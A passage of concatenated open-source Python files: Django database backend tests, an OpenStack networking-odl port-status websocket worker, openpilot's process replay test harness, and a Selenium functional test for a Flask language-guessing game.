reporter=self.r, reporter_proxy=r_proxy)
# Retreive the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TestCase):
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TransactionTestCase):
available_apps = ['backends']
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field_by_name("related_objects")[0].rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
class DBTestSettingsRenamedTests(IgnoreAllDeprecationWarningsMixin, TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
@classmethod
def setUpClass(cls):
# Silence "UserWarning: Overriding setting DATABASES can lead to
# unexpected behavior."
cls.warning_classes.append(UserWarning)
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
|
port_status_update.py
|
# Copyright (c) 2017 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from neutron_lib.callbacks import resources
from neutron_lib import constants as n_const
from neutron_lib import context
from neutron_lib.plugins import directory
from neutron_lib import worker
from oslo_log import log
from neutron.db import provisioning_blocks
from networking_odl.common import client as odl_client
from networking_odl.common import odl_features
from networking_odl.common import utils
from networking_odl.common import websocket_client as odl_ws_client
LOG = log.getLogger(__name__)
class OdlPortStatusUpdate(worker.BaseWorker):
"""Class to register and handle port status update"""
PORT_PATH = "restconf/operational/neutron:neutron/ports/port"
def __init__(self):
super(OdlPortStatusUpdate, self).__init__()
self.odl_websocket_client = None
def start(self):
super(OdlPortStatusUpdate, self).start()
LOG.debug('OdlPortStatusUpdate worker running')
if odl_features.has(odl_features.OPERATIONAL_PORT_STATUS):
self.run_websocket()
def stop(self):
if self.odl_websocket_client:
self.odl_websocket_client.set_exit_flag()
def wait(self):
"""Wait for service to complete."""
@staticmethod
def reset():
pass
def run_websocket(self):
# OpenDaylight path to recieve websocket notifications on
neutron_ports_path = "/neutron:neutron/neutron:ports"
self.path_uri = utils.get_odl_url()
self.odl_websocket_client = (
odl_ws_client.OpenDaylightWebsocketClient.odl_create_websocket(
self.path_uri, neutron_ports_path,
odl_ws_client.ODL_OPERATIONAL_DATASTORE,
odl_ws_client.ODL_NOTIFICATION_SCOPE_SUBTREE,
self._process_websocket_recv,
self._process_websocket_reconnect,
True
))
def _process_websocket_recv(self, payload, reconnect):
# Callback for websocket notification
LOG.debug("Websocket notification for port status update")
for event in odl_ws_client.EventDataParser.get_item(payload):
operation, path, data = event.get_fields()
if ((operation in [event.OPERATION_UPDATE,
event.OPERATION_CREATE])):
port_id = event.extract_field(path, "neutron:uuid")
port_id = str(port_id).strip("'")
status_field = data.get('status')
if status_field is not None:
status = status_field.get('content')
LOG.debug("Update port for port id %s %s", port_id, status)
# for now we only support transition from DOWN->ACTIVE
# https://bugs.launchpad.net/networking-odl/+bug/1686023
if status == n_const.PORT_STATUS_ACTIVE:
provisioning_blocks.provisioning_complete(
context.get_admin_context(),
port_id, resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
if operation == event.OPERATION_DELETE:
LOG.debug("PortStatus: Ignoring delete operation")
def _process_websocket_reconnect(self, status):
if status == odl_ws_client.ODL_WEBSOCKET_CONNECTED:
# Get port data using restconf
LOG.debug("Websocket notification on reconnection")
reconn_thread = threading.Thread(
name='websocket', target=self._pull_missed_statuses)
reconn_thread.start()
def _pull_missed_statuses(self):
LOG.debug("starting to pull pending statuses...")
plugin = directory.get_plugin()
filter = {"status": [n_const.PORT_STATUS_DOWN],
"vif_type": ["unbound"]}
ports = plugin.get_ports(context.get_admin_context(), filter)
if not ports:
LOG.debug("no down ports found, done")
return
port_fetch_url = utils.get_odl_url(self.PORT_PATH)
client = odl_client.OpenDaylightRestClient.create_client(
url=port_fetch_url)
for port in ports:
port_id = port["id"]
response = client.get(port_id)
if response.status_code != 200:
LOG.warning("Non-200 response code %s", str(response))
continue
odl_status = response.json()['port'][0]['status']
if odl_status == n_const.PORT_STATUS_ACTIVE:
# for now we only support transition from DOWN->ACTIVE
# See https://bugs.launchpad.net/networking-odl/+bug/1686023
provisioning_blocks.provisioning_complete(
context.get_admin_context(),
port_id, resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
LOG.debug("done pulling pending statuses")
|
process_replay.py
|
#!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
from collections import namedtuple
import capnp
from tqdm import tqdm
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from selfdrive.car.car_helpers import get_car
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"deviceState": [], "pandaState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
"modelV2": [], "driverCameraState": [], "roadCameraState": [], "ubloxRaw": [], "managerState": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "carState": [], "modelV2": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"modelV2": ["lateralPlan"], "radarState": ["longitudinalPlan"],
"carState": [], "controlsState": [],
},
ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["driverMonitoringState"],
"liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
),
]
def replay_process(cfg, lr):
proc = managed_processes[cfg.proc_name]
if isinstance(proc, PythonProcess):
return python_replay_process(cfg, lr)
else:
return cpp_replay_process(cfg, lr)
def python_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
os.environ['FINGERPRINT'] = msg.carParams.carFingerprint
assert(type(managed_processes[cfg.proc_name]) is PythonProcess)
managed_processes[cfg.proc_name].prepare()
mod = importlib.import_module(managed_processes[cfg.proc_name].module)
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs, disable=CI):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
sockets = {s: messaging.sub_sock(s, timeout=1000) for s in sub_sockets}
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
managed_processes[cfg.proc_name].prepare()
managed_processes[cfg.proc_name].start()
time.sleep(1) # We give the process time to start
log_msgs = []
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for msg in tqdm(pub_msgs, disable=CI):
pm.send(msg.which(), msg.as_builder())
resp_sockets = sub_sockets if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is not None:
log_msgs.append(response)
managed_processes[cfg.proc_name].stop()
return log_msgs
|
functional_tests.py
|
import unittest
import threading
from selenium import webdriver
from app import db
from app import create_app
from app.models import LanguageTest
class FavProgLangTestCase(unittest.TestCase):
'''
Things to test:
x All the flows in wiki/app-flow-chart.svg
x Can't go to any other pages without starting from index page
Setup:
- A running testing server hosting the application
'''
index_page_url = 'http://127.0.0.1:5000/'
@classmethod
def setUpClass(cls):
cls.app = create_app('testing')
# Suppress logging to keep unittest output clean
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel('ERROR')
# Start the Flask server.
threading.Thread(target=cls.app.run).start()
# cls.driver = webdriver.Chrome()
cls.driver = webdriver.Firefox()
cls.ctx = cls.app.app_context()
cls.ctx.push()
@classmethod
def tearDownClass(cls):
cls.driver.get(cls.index_page_url + 'shutdown')
cls.driver.close()
cls.ctx.pop()
def setUp(self):
if not self.driver:
self.skipTest('Webdriver not ready.')
db.create_all()
# Populate database with data.
LanguageTest.init(db)
self.driver.delete_all_cookies()
def tearDown(self):
db.session.remove()
db.drop_all()
def test_index_page_can_go_to_question_page(self):
driver = self.driver
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
self.assertIn('/question', qlink.get_attribute('href'),
'Question page url is not in index page.')
def test_question_has_a_correct_guess_finish_game(self):
'''
This test tests this story:
Index Page -> Question Page -> Have A Guess? -[Yes]-> Guess Page
-> Guess Correct? -[Yes]-> Index Page
During test, we assume the _first_ record in database language test
table is:
LanguageTest('Is it interpreted?', True, 'Python')
'''
driver = self.driver
# index page to question page
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
qlink.click()
# Question page, choose yes, we have a guess result for it.
qyes = driver.find_element_by_css_selector('input[value="yes"]')
qsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
qyes, 'Question answer yes radio button should exist.')
self.assertIsNotNone(qsubmit, 'Question submit button should exist.')
qyes.click()
qsubmit.click()
# guess page, we guess correctly
gyes = driver.find_element_by_css_selector('input[value="yes"]')
gsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
gyes, 'Guess correctness yes radio button should exist.')
self.assertIsNotNone(gsubmit, 'Guess submit button should exist.')
gyes.click()
gsubmit.click()
# redirect to index page
self.assertEqual(
driver.current_url, self.index_page_url,
'It should redirect to index page %s now.' % self.index_page_url)
def test_no_guess_for_question_has_more_questions_go_to_next_question(self):
'''
This test tests this story:
Index Page -> Question Page -> Have A Guess?
-[No]-> Has More Questions? -[Yes]-> Question Page
During test, we assume the _first two_ records in database language test
table are:
LanguageTest('Is it interpreted?', True, 'Python')
LanguageTest('Does it enforce indentation?', False, 'Ruby')
'''
# Setup test database
lt = LanguageTest('Does it enforce indentation?', False, 'Ruby')
db.session.add(lt)
db.session.commit()
driver = self.driver
# Index page to question page
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
qlink.click()
# Question page, choose no, we don't have a guess result for it
qno = driver.find_element_by_css_selector('input[value="no"]')
qsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
qno, 'Question answer no radio button should exist.')
self.assertIsNotNone(qsubmit, 'Question submit button should exist.')
qno.click()
qsubmit.click()
# We should go back to question page now, which shows the second
# question.
self.assertEqual(driver.current_url, self.index_page_url + 'question',
'We should be at question page now.')
next_question = driver.find_element_by_tag_name('h2').text
self.assertEqual(next_question, lt.question,
'Next question should be %s' % lt.question)
def test_cannot_guess_from_current_question_go_to_next_question(self):
'''
This test tests this story:
Index Page -> Question Page -> Have A Guess?
-[Yes]-> Guess Page -> Guess Correctly?
-[No]-> Has More Questions? -[Yes]-> Question Page
During test, we assume the _first two_ records in database language test
table are:
LanguageTest('Is it interpreted?', True, 'Python')
LanguageTest('Does it enforce indentation?', False, 'Ruby')
'''
# Setup test database
lt = LanguageTest('Does it enforce indentation?', False, 'Ruby')
db.session.add(lt)
db.session.commit()
driver = self.driver
# Index page to question page
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
qlink.click()
# Question page, choose yes, we have a guess result for it.
qyes = driver.find_element_by_css_selector('input[value="yes"]')
qsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
qyes, 'Question answer yes radio button should exist.')
self.assertIsNotNone(qsubmit, 'Question submit button should exist.')
qyes.click()
qsubmit.click()
# Guess page, choose _no_, our guess is wrong.
gno = driver.find_element_by_css_selector('input[value="no"]')
gsubmit = driver.find_element_by_css_selector('input[type="submit"]')
self.assertIsNotNone(
gno, 'Guess correctness no radio button should exist.')
self.assertIsNotNone(gsubmit, 'Guess submit button should exist.')
gno.click()
gsubmit.click()
# Since there're more questions, it will go to the next question now.
self.assertEqual(driver.current_url, self.index_page_url + 'question',
'We should see the next question page now.')
next_question = driver.find_element_by_tag_name('h2').text
self.assertEqual(next_question, lt.question,
'Next question should be %s' % lt.question)
def test_cannot_guess_language_go_to_new_language_page_finish_game(self):
'''
This test tests this story:
Index Page -> Question Page -> Have A Guess? -[Yes]-> Guess Page
-> Guess Correct? -[No]-> Has More Questions?
-[No]-> Add New Language Page -> Index Page
During test, we assume the _only_ record in database language test
table is:
LanguageTest('Is it interpreted?', True, 'Python')
'''
driver = self.driver
# Index page to question page
driver.get(self.index_page_url)
qlink = driver.find_element_by_tag_name('a')
qlink.click()
